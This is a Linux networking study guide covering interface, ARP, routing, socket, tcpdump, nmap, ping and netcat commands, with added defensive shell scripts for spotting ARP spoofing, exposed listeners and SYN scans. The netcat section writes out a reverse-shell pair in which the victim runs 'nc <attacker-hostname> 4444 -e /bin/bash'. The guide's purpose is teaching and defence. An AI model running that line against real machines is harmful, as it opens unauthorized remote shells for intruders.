Linux Networking
Network interface Management
1. Wired Interfaces
There are two main subcommands: ip link (Layer 2, the interface itself) and ip addr (Layer 3, the addresses assigned to it). Both offer a CRUD-style interface (add/del/show/...); ip <command> help prints the syntax. The ip commands (from iproute2) replace the deprecated ifconfig. Changes made with ip take effect immediately but are not persistent: they are lost at reboot unless also written to the distro's network configuration (see below).
ip link CRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
ip addr CRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>
2. Wireless Interfaces
iw replaces iwconfig and iwlist. iw dev manages the wireless interfaces: scanning for available networks, connecting to a network by SSID, showing link state, etc. iw phy manages the underlying radio hardware (PHY). Scanning and connecting need root. Note that iw dev ... connect only handles open (and legacy WEP) networks; WPA/WPA2/WPA3 networks need a supplicant such as wpa_supplicant (or nmcli dev wifi connect) to run the key exchange.
iw dev wlan0 link # information about the link
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>
3. ARP protocol
ip [-s] neigh shows the neighbour table, i.e. the ARP cache (and the NDP cache for IPv6); -s adds statistics. ip n (short for ip neigh) supports add, del, show and replace to manage entries:
ip n add <ip-addr> lladdr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladdr <mac-addr> dev <interface-name> # replace or add the MAC for the IP address; append nud permanent to pin a static entry (e.g. the gateway) that ARP replies cannot overwrite
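Because the neighbour table is populated from unauthenticated ARP replies, it is the first place to look for ARP spoofing. The following POSIX shell functions, an added example that is not part of the original notes, audit the text of ip neigh show for the two classic symptoms: one MAC answering for several IPv4 addresses, and the gateway's cached MAC differing from a value pinned earlier on a known-good network. SAMPLE_NEIGH and PINNED_GATEWAY_MAC are constructed for the demo (the listing shows 10.0.3.23 poisoning the entry for the gateway 10.0.3.1); on a live host pass "$(ip neigh show dev eth0)" instead.

```sh
#!/bin/sh
# Added example (not from the original notes): audit an `ip neigh show` listing
# for ARP-spoofing symptoms. SAMPLE_NEIGH is a constructed listing, not a real
# capture, and PINNED_GATEWAY_MAC is an assumed value recorded on a clean network.

SAMPLE_NEIGH='10.0.3.1 dev eth0 lladdr 52:54:00:de:ad:23 REACHABLE
10.0.3.22 dev eth0 lladdr 52:54:00:aa:bb:22 STALE
10.0.3.23 dev eth0 lladdr 52:54:00:de:ad:23 REACHABLE
10.0.3.40 dev eth0 FAILED
fe80::1 dev eth0 lladdr 52:54:00:aa:bb:01 router REACHABLE'
PINNED_GATEWAY_MAC=52:54:00:aa:bb:01

# 1) MACs claimed by more than one IPv4 address: prints "<mac> <ip> <ip> ...", one line per MAC.
#    IPv6 entries (first field contains ':') are skipped on purpose: a dual-stack router
#    legitimately shares its MAC between its IPv4 and link-local IPv6 addresses.
shared_macs() {
    printf '%s\n' "$1" | awk '
        $1 !~ /:/ && /lladdr/ {
            for (i = 1; i <= NF; i++) if ($i == "lladdr") mac = $(i + 1)
            ips[mac] = ips[mac] " " $1
            n[mac]++
        }
        END { for (m in n) if (n[m] > 1) print m ips[m] }'
}

# 2) The MAC currently cached for IP $2 (empty when the entry is unresolved or absent).
gateway_mac() {
    printf '%s\n' "$1" | awk -v gw="$2" '
        $1 == gw { for (i = 1; i <= NF; i++) if ($i == "lladdr") print $(i + 1) }'
}

# Returns 0 when the cached MAC for $2 equals the pinned MAC $3, 1 otherwise.
check_gateway() {
    [ "$(gateway_mac "$1" "$2")" = "$3" ]
}

# Demo against the constructed sample.
echo "MACs claimed by more than one IPv4 address:"
shared_macs "$SAMPLE_NEIGH"
if check_gateway "$SAMPLE_NEIGH" 10.0.3.1 "$PINNED_GATEWAY_MAC"; then
    echo "gateway MAC matches the pinned value"
else
    echo "ALERT: gateway 10.0.3.1 now resolves to $(gateway_mac "$SAMPLE_NEIGH" 10.0.3.1)"
fi
```

Once the real gateway MAC is known, the defensive counterpart is the ip n replace command above with nud permanent, so that spoofed replies can no longer update the entry; a shared MAC between two IPv4 hosts is still worth investigating, but can also be a legitimate VRRP/HSRP or proxy-ARP setup.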
Notes
- Difference between link, device and interface: in the Linux context they all refer to the kernel's netdev, but in networking they can mean different things:
  - Link: the actual circuit, path and/or cable between ports.
  - Device: either the entire system, or the component within it that creates the electrical (or optical) signal.
  - Interface: the logical middle ground between the two, usually in the context of the OS (eth0, f0/0, etc.).
TCP/IP
1. Routing
iproute2 handles routing through the ip route command. As with addresses, the changes are immediate but not persistent. The quickest way to verify the table is ip route get <destination>, which prints the route and source address the kernel would actually pick.
ip route add <network-ip-address>/<mask> via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/<mask> via <router-ip-address> dev <interface-name>
ip route add default via <default-gateway-ip> [dev <interface-name>]
ip route add prohibit <network-ip-address>/<mask> # reject the route: local senders get EACCES, forwarded packets are answered with ICMP "administratively prohibited"
ip route add blackhole <network-ip-address>/<mask> # drop packets for that network silently
2. TCP ports
iproute2 replaces netstat with ss:
ss -lntp
# -l: listening sockets, -n: numeric ports and addresses (no DNS lookups), -t: TCP (add -u for UDP), -p: show the process owning each socket (root is needed to see other users' processes)
lsof is very useful too: sockets are files, so it can list them per user, per process or per port.
lsof -i4 # list all IPv4 network files (sockets)
lsof -p <pid> # list by pid
lsof -u <username> # list by user; prefix the name with ^ to negate (everyone except that user)
lsof -i <protocol>:<port> # list by protocol and port, e.g. tcp:22
lsof <file-path> # processes that have a file open
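What a practitioner usually wants from ss -lntp is not the raw list but the answer to "which services are reachable from every interface?". The following POSIX shell function, an added example that is not part of the original notes, reads ss -lntp text on stdin and reports only the listeners bound to a wildcard address (0.0.0.0, * or [::]) together with the owning process. SAMPLE_SS is a constructed listing; the process names, PIDs and ports in it are made up.

```sh
#!/bin/sh
# Added example (not from the original notes): report listening TCP sockets that are
# bound to a wildcard address and therefore reachable from every interface.
# SAMPLE_SS is a constructed `ss -lntp` listing, not output from a real host.

SAMPLE_SS='State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       128      127.0.0.1:5432        0.0.0.0:*          users:(("postgres",pid=812,fd=5))
LISTEN  0       4096     0.0.0.0:22            0.0.0.0:*          users:(("sshd",pid=611,fd=3))
LISTEN  0       511      *:8080                *:*                users:(("java",pid=1402,fd=21))
LISTEN  0       128      [::1]:6379            [::]:*             users:(("redis-server",pid=955,fd=6))
LISTEN  0       4096     [::]:22               [::]:*             users:(("sshd",pid=611,fd=4))'

# Reads `ss -lntp` text on stdin; prints "<port> <process>" for each exposed listener,
# sorted by port. The process is "-" when ss ran without root (no -p data available).
exposed_listeners() {
    awk '
        $1 == "LISTEN" {
            n = split($4, a, ":")                       # the port is the text after the last ":"
            port = a[n]
            addr = substr($4, 1, length($4) - length(port) - 1)
            if (addr != "0.0.0.0" && addr != "*" && addr != "[::]") next
            proc = "-"
            if (match($0, /"[^"]+"/)) proc = substr($0, RSTART + 1, RLENGTH - 2)
            key = port " " proc
            if (!seen[key]++) print key                 # the same service on v4 and v6 is reported once
        }' | sort -n
}

# Demo on the constructed sample; on a live host run:  ss -lntpH | exposed_listeners
printf '%s\n' "$SAMPLE_SS" | exposed_listeners
```

In the sample only sshd (22) and the java process on 8080 are exposed; postgres and redis are bound to loopback and stay out of the report. Anything unexpected in this list is a candidate for binding to 127.0.0.1 or for a firewall rule.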
3. TCPDump
tcpdump captures packets on any network interface (including loopback, Bluetooth and the pseudo-interface any). It needs root or the CAP_NET_RAW capability, and the files it writes with -w are in pcap format, which Wireshark reads directly.
tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file
TCPDump Cheatsheet
| Option | Description |
|---|---|
| -D | List interfaces available for capture |
| -i eth0 / -i any | Capture packets on one interface (eth0) or on all interfaces (any) |
| -c | Capture a specified count of packets |
| -n | Disable hostname resolution |
| -nn | Disable protocol, port, and hostname resolution |
| -i any protocol | Capture packets by protocol on all interfaces |
| -i any host 10.0.2.18 | Capture packets by a host on all interfaces |
| -i any src/dst 10.0.2.10 | Capture packets by source or destination address on all interfaces |
| -A | View packet content in ASCII |
| -X | View packet content in hex and ASCII |
| -w file_name.pcap | Save the output of tcpdump to a file |
| -r file_name.pcap | Read packets from a file |
4. Port Scanning with Nmap
Nmap is a port scanner (with host discovery, service/version detection and NSE scripts on top). It supports many scanning modes; the ones below cover day-to-day use.
nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU <hostname> # UDP scan (TCP is the default); slow, because open UDP ports usually do not answer
nmap -sS <hostname> # TCP SYN ("half-open") scan: sends a SYN and answers the SYN/ACK with a RST instead of completing the handshake, so the connection never reaches the application. Fast and quieter in application logs, but it needs root (raw sockets); it is the default when nmap runs as root
nmap -sT <hostname> # TCP connect scan: full three-way handshake through connect(), no root needed and the default for unprivileged users; it does show up in the target's application logs
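The -sS scan and the tcpdump section above are two sides of the same packet: a SYN scanner sends a bare SYN to many ports of one host and never completes a handshake, while a normal client touches a few ports and follows the SYN/ACK with an ACK. The following POSIX shell function, an added example that is not part of the original notes, reads tcpdump -n text on stdin and reports every source that sent bare SYNs to at least THRESHOLD distinct destination ports. SAMPLE_TCPDUMP is a constructed capture (10.0.2.18 is scanning 10.0.2.10, 10.0.2.25 is a normal SSH client); the threshold is a tuning parameter, not a value from the page.

```sh
#!/bin/sh
# Added example (not from the original notes): spot a SYN scan in `tcpdump -n` text.
# SAMPLE_TCPDUMP is constructed, not a real capture; the 10.0.2.x addresses are made up.

SAMPLE_TCPDUMP='12:00:01.000001 IP 10.0.2.18.40001 > 10.0.2.10.22: Flags [S], seq 1, win 1024, length 0
12:00:01.000002 IP 10.0.2.10.22 > 10.0.2.18.40001: Flags [S.], seq 2, ack 2, win 64240, length 0
12:00:01.000003 IP 10.0.2.18.40001 > 10.0.2.10.22: Flags [R], seq 2, win 0, length 0
12:00:01.000004 IP 10.0.2.18.40002 > 10.0.2.10.80: Flags [S], seq 1, win 1024, length 0
12:00:01.000005 IP 10.0.2.10.80 > 10.0.2.18.40002: Flags [R.], seq 0, ack 2, win 0, length 0
12:00:01.000006 IP 10.0.2.18.40003 > 10.0.2.10.443: Flags [S], seq 1, win 1024, length 0
12:00:01.000007 IP 10.0.2.18.40004 > 10.0.2.10.3306: Flags [S], seq 1, win 1024, length 0
12:00:01.000008 IP 10.0.2.18.40005 > 10.0.2.10.8080: Flags [S], seq 1, win 1024, length 0
12:00:02.000001 IP 10.0.2.25.51000 > 10.0.2.10.22: Flags [S], seq 1, win 64240, options [mss 1460], length 0
12:00:02.000002 IP 10.0.2.10.22 > 10.0.2.25.51000: Flags [S.], seq 2, ack 2, win 64240, length 0
12:00:02.000003 IP 10.0.2.25.51000 > 10.0.2.10.22: Flags [.], ack 3, win 502, length 0'

# syn_scanners THRESHOLD: reads `tcpdump -n` lines on stdin and prints
# "<source-ip> <distinct-ports>" for every source whose bare-SYN packets (Flags [S],
# no ACK bit) reached at least THRESHOLD distinct destination host:port pairs.
syn_scanners() {
    awk -v thr="$1" '
        $2 == "IP" && $6 == "Flags" {
            flags = $7; gsub(/[][,]/, "", flags)      # "[S]," -> "S"
            src = $3; sub(/\.[0-9]+$/, "", src)       # strip the source port
            dst = $5; sub(/:$/, "", dst)              # "10.0.2.10.22:" -> "10.0.2.10.22"
            if (flags == "S" && !seen[src, dst]++) ports[src]++
        }
        END { for (s in ports) if (ports[s] >= thr) print s, ports[s] }' | sort
}

# Demo on the constructed sample; live equivalent:  tcpdump -n -i any 'tcp[tcpflags] & tcp-syn != 0' | syn_scanners 10
printf '%s\n' "$SAMPLE_TCPDUMP" | syn_scanners 3
```

The scanner is reported with 5 ports while the legitimate client, which completed its handshake, stays below the threshold; the SYN/ACK and RST lines from the target are ignored because their flags are not a bare S. The BPF filter in the live command only passes packets with the SYN bit set, so the shell does not have to read the whole stream.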
5. Interacting with remote hosts
ping sends ICMP Echo Request packets to a destination and reports the Echo Replies. It is very useful for troubleshooting and discovery, but many hosts and firewalls drop ICMP, so the absence of a reply does not prove that a host is down.
Ping Cheatsheet
| Option | Description |
|---|---|
| hostname | Send a stream of ICMP packets to a hostname |
| 10.0.2.10 | Send a stream of ICMP packets to an IP address |
| -c 5 10.0.2.10 | Send a specified amount of packets |
| -s 100 10.0.2.10 | Alter the size of the packets |
| -i 3 10.0.2.10 | Change the interval for sending packets |
| -q 10.0.2.10 | Only show the summary information |
| -w 5 10.0.2.10 | Deadline: stop after 5 seconds, whatever the number of packets sent |
| -f 10.0.2.10 | Flood ping: send packets as fast as replies arrive (only root may use a zero interval); saturates the link, so use it only on networks you own |
| -p ff 10.0.2.10 | Fill a packet with data. ff fills the packet with ones |
| -b 10.0.2.10 | Send packets to a broadcast address |
| -t 10 10.0.2.10 | Set the IP TTL to 10, which limits the number of hops the packet may cross |
| -v 10.0.2.10 | Increase verbosity |
6. Netcat
Netcat is also very useful here: it reads and writes raw data across TCP or UDP connections. Several implementations exist (OpenBSD nc, the traditional GNU netcat, Nmap's ncat) and their flags differ slightly.
nc -l <port> # listen on a TCP port
nc -u -l <port> # listen on a UDP port
nc -v -z <ip-address> <port> # zero-I/O mode: report whether the port is open without sending data
# Reverse shell (-e exists in traditional netcat and ncat, not in OpenBSD nc)
nc -lvp 4444 # on the attacker machine: listen for the incoming connection
nc <attacker-hostname> 4444 -e /bin/bash # on the victim machine: connect back and attach a shell (unencrypted, visible to anyone sniffing the path)
# File transfer (nc gives no integrity guarantee: compare a checksum on both ends)
nc -lvp 4444 > test.txt # receiver
nc <hostname> 4444 < test.txt # sender
# Send a GET request to a web server
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>
Network Configurations
1. RHEL Based systems (Old)
Before NetworkManager keyfiles, every interface had an ifcfg-<name> file in /etc/sysconfig/network-scripts (RHEL 8 still reads them through the ifcfg-rh plugin; RHEL 9 deprecates them in favour of /etc/NetworkManager/system-connections/*.nmconnection). The main keys:
| Option | Description |
|---|---|
| TYPE=Ethernet | The type of network interface device (e.g., Ethernet, Wi-Fi) |
| BOOTPROTO=none | Specify boot protocol (none, dhcp, bootp) |
| DEFROUTE=yes | Specify default route for IPv4 traffic (yes, no) |
| IPV6_DEFROUTE=yes | Specify default route for IPv6 traffic (yes, no) |
| IPV4_FAILURE_FATAL=no | Treat a failed IPv4 configuration as fatal and bring the device down (yes, no) |
| IPV6_FAILURE_FATAL=no | Treat a failed IPv6 configuration as fatal and bring the device down (yes, no) |
| IPV6INIT=yes | Enable or disable IPv6 on the interface (yes, no) |
| IPV6_AUTOCONF=yes | Enable or disable autoconf configuration (yes, no) |
| NAME=eth0 | Specify a name for the connection |
| UUID=... | Specify the unique identifier for the device |
| ONBOOT=yes | Activate interface on boot (yes, no) |
| HWADDR=00:00:00:00:00:00 | Specify the MAC address for the interface |
| IPADDR=10.0.1.10 | Specify the IPv4 address. |
| PREFIX=24 | Specify the network prefix. |
| NETMASK=255.255.255.0 | Specify the netmask (older alternative to PREFIX; keep the two consistent). |
| GATEWAY=10.0.1.1 | Specify the gateway. |
| DNS1=192.168.123.3 | Specify a DNS server. |
| DNS2=192.168.123.2 | Specify another DNS server. |
| PEERDNS=yes | Modify the /etc/resolv.conf file (yes/no). |
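PREFIX and NETMASK describe the same thing, and a file that carries an inconsistent or malformed pair is a classic source of "the interface came up but nothing routes". The following POSIX shell functions, an added example that is not part of the original notes, convert between the two forms (rejecting non-contiguous or truncated masks) and write a minimal static-IP ifcfg-<name> file from an address in CIDR notation. The destination directory is a parameter so the script can be tried in a scratch directory; the addresses in the demo are made up.

```sh
#!/bin/sh
# Added example (not from the original notes): PREFIX <-> NETMASK conversion and a
# generator for a minimal static-IP ifcfg-<name> file in the format of the table above.
# Pass /etc/sysconfig/network-scripts as DIR on a real host; the demo uses mktemp -d.

# 24 -> 255.255.255.0 ; fails for anything that is not an integer in 0..32
prefix_to_netmask() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -le 32 ] || return 1
    if [ "$1" -eq 0 ]; then mask=0; else mask=$(( (4294967295 << (32 - $1)) & 4294967295 )); fi
    printf '%d.%d.%d.%d\n' $(( (mask >> 24) & 255 )) $(( (mask >> 16) & 255 )) \
                            $(( (mask >> 8) & 255 )) $(( mask & 255 ))
}

# 255.255.255.0 -> 24 ; rejects truncated (255.255.255) and non-contiguous (255.0.255.0) masks
netmask_to_prefix() {
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case $o in ''|*[!0-9]*) return 1 ;; esac
        [ "$o" -le 255 ] || return 1
    done
    v=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
    n=0
    while [ $n -lt 32 ] && [ $(( (v >> (31 - n)) & 1 )) -eq 1 ]; do n=$((n + 1)); done
    [ $(( v & ((1 << (32 - n)) - 1) )) -eq 0 ] || return 1   # every bit after the first 0 must be 0
    echo $n
}

# write_ifcfg DIR NAME ADDR/PREFIX GATEWAY DNS : writes DIR/ifcfg-NAME with a consistent PREFIX/NETMASK pair
write_ifcfg() {
    dir=$1; name=$2; ip=${3%/*}; prefix=${3#*/}; gw=$4; dns=$5
    mask=$(prefix_to_netmask "$prefix") || return 1
    cat > "$dir/ifcfg-$name" <<EOF
TYPE=Ethernet
BOOTPROTO=none
NAME=$name
DEVICE=$name
ONBOOT=yes
DEFROUTE=yes
IPADDR=$ip
PREFIX=$prefix
NETMASK=$mask
GATEWAY=$gw
DNS1=$dns
PEERDNS=yes
IPV6INIT=no
EOF
}

# Demo in a scratch directory (values are made up)
scratch=$(mktemp -d)
write_ifcfg "$scratch" eth0 10.0.1.10/24 10.0.1.1 192.168.123.3 && cat "$scratch/ifcfg-eth0"
```

netmask_to_prefix returns non-zero for 255.255.255, the three-octet value that is easy to type by mistake, and for masks with a gap in the ones, which the kernel would reject at ifup time with a much less helpful error.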
2. Debian Based Systems (Old)
On Debian-based systems the interface configuration goes into /etc/network/interfaces (plus drop-in files under /etc/network/interfaces.d/), handled by ifupdown (ifup/ifdown). Interfaces named on an auto line are brought up at boot; allow-hotplug interfaces are brought up when the kernel detects them. Recent Ubuntu releases use netplan (/etc/netplan/*.yaml) instead.
3. Distro agnostic config files
In addition to the distro-specific network configuration files, the most common remaining ones are:
- /etc/hosts: name to IP address associations, consulted before DNS
- /etc/resolv.conf: DNS resolver configuration (often generated by NetworkManager or systemd-resolved rather than edited by hand)
- /etc/sysconfig/network: global network settings (RHEL family only)
- /etc/nsswitch.conf: the Name Service Switch config file, which sets the sources of name-service information (files, dns, ...) and the order in which they are queried
- /etc/hostname: holds the machine hostname (set or shown with hostname or hostnamectl)
- /etc/hosts.deny and /etc/hosts.allow: TCP Wrappers access control for services linked against libwrap (ALL matches everything; hosts.allow is checked first, then hosts.deny, and the first match wins). Only daemons built with libwrap honour these files, and recent OpenSSH packages on several distros are not, so check the sshd binary with ldd before relying on them and prefer firewall rules or sshd_config Match blocks when in doubt. For example, to only allow hosts from the 10.0.3.0/24 network to reach SSH (a pattern ending in a dot matches an address prefix; 10.0.3.0/255.255.255.0 is the equivalent net/mask form):
# /etc/hosts.deny
sshd : ALL
# /etc/hosts.allow
sshd : 10.0.3.
4. Network Manager
- Network Manager vs ifcfg-* options (the canonical nmcli con mod property is shown; the shorthand in parentheses is what nmcli con add accepts)
| nmcli con mod | ifcfg-* file | Purpose |
|---|---|---|
| ipv4.method manual | BOOTPROTO=none | Set a static IPv4 address |
| ipv4.method auto | BOOTPROTO=dhcp | Obtain the IPv4 address with DHCP |
| ipv4.addresses 192.168.0.10/24 (ip4) | IPADDR=192.168.0.10 PREFIX=24 | Set the IPv4 address and prefix |
| ipv4.gateway 192.168.0.1 (gw4) | GATEWAY=192.168.0.1 | Set the IPv4 default gateway |
| ipv4.dns 8.8.8.8 | DNS1=8.8.8.8 | Specify a DNS server |
| connection.autoconnect yes (autoconnect) | ONBOOT=yes | Automatically activate this connection on boot |
| connection.id eth0 (con-name) | NAME=eth0 | Specify the name of the connection |
| connection.interface-name eth0 (ifname) | DEVICE=eth0 | Specify the interface for the connection |
| 802-3-ethernet.mac-address ADDR | HWADDR=... | Specify the MAC address of the interface for the connection |
nmcli commands
| Command | Purpose |
|---|---|
| nmcli dev status | Show the status of all network interfaces |
| nmcli con show | List all connections |
| nmcli con show name | Show the current settings of the connection name |
| nmcli con add con-name name ... | Add a new connection named name |
| nmcli con mod name ... | Modify a connection |
| nmcli con reload | Reload the connection configuration files from disk |
| nmcli con up name / nmcli con down name | Activate or deactivate a connection |
| nmcli dev dis dev | Disconnect the interface dev and stop it from autoconnecting until reactivated manually |
| nmcli con del name | Delete the connection and its configuration file |
Network Diagnostics and Troubleshooting
1. Traffic analysis with Traceroute and MTR
traceroute tracks the route packets take from source to destination. By default it sends UDP probes to high ports; -I switches to ICMP Echo and -T to TCP SYN (both need root). tracepath is a simpler alternative with fewer options that also works without root.
traceroute -n -q 2 -I www.google.com # Don't resolve hostnames, use ICMP Echo, send only 2 probes per hop
mtr, on the other hand, uses ICMP Echo by default; -T switches to TCP SYN and -u to UDP. mtr is a TUI that keeps probing and accumulates per-hop statistics (loss, latency, jitter), which makes intermittent problems visible that a single traceroute run misses.
mtr -r -c 3 -f 4 www.google.com # Report mode instead of the interactive TUI: 3 cycles, start at the 4th hop (TTL 4)
mtr -run4 -c 3 www.google.com # Report mode, UDP probes, no name resolution, IPv4 only
mtr -w -c 3 www.google.com # Wide report: hostnames and addresses are not truncated
2. Network logs
Debian-based systems write the syslog stream to /var/log/syslog, RHEL-based systems to /var/log/messages (both through rsyslog; minimal installs may keep only the journal).
Another source is the systemd journal, stored in a binary format and read with journalctl (journalctl -k for kernel messages, journalctl -u NetworkManager for a single unit). In addition, dmesg reads the kernel ring buffer directly, which is where link up/down, driver and netfilter LOG messages appear first.
Notes
- Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
- Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
- The kernel ring buffer is a data structure in the Linux kernel that stores the log messages generated by the kernel. It is a cyclic buffer that holds only the most recent messages and can be read through /dev/kmsg (or the older /proc/kmsg) or with the dmesg command. It gives system administrators a quick way to diagnose and troubleshoot problems; note that the kernel.dmesg_restrict sysctl can limit reading it to root.